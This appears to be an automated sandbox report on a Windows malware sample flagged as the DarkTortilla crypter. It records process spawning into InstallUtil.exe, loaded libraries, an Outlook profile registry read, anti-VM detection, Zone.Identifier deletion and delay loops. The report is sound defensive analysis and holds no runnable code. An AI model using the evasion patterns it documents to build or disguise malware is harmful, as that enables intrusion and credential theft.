Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5qJ6QQTcRS.exe	ReversingLabs: Detection: 75%
Source: 5qJ6QQTcRS.exe	Virustotal: Detection: 67%

Source: unknown	Process created: C:\Users\user\Desktop\5qJ6QQTcRS.exe "C:\Users\user\Desktop\5qJ6QQTcRS.exe"
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 5qJ6QQTcRS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 5qJ6QQTcRS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3b01960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.5b60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.5b60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3b01960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06129378 push esp; iretd	0_2_06129379
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06127F80 pushfd ; ret	0_2_06127F89
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07574B80 pushfd ; retf	0_2_07574B81
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0757B105 push ebp; iretd	0_2_0757B106
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07692A46 push 00000033h; ret	0_2_07692A48
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769EAC0 pushfd ; retf	0_2_0769EAC1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07691153 push E8FFFFFDh; iretd	0_2_0769115D
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_076929A6 push 00000033h; ret	0_2_076929A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07697D83 push ebx; retf	0_2_07697D84
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07F511B8 push FFFFFF8Bh; iretd	0_2_07F511BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F89C30 push esp; retf 00FCh	4_2_00F89D55

Source: 5qJ6QQTcRS.exe

Static PE information: section name: .text entropy: 7.081769071361407

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

File opened: C:\Users\user\Desktop\5qJ6QQTcRS.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Section loaded: OutputDebugStringW count: 1939

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: 49A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: 8160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: 9160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: 9340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: A340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: A6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory allocated: B6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597860	Jump to behavior
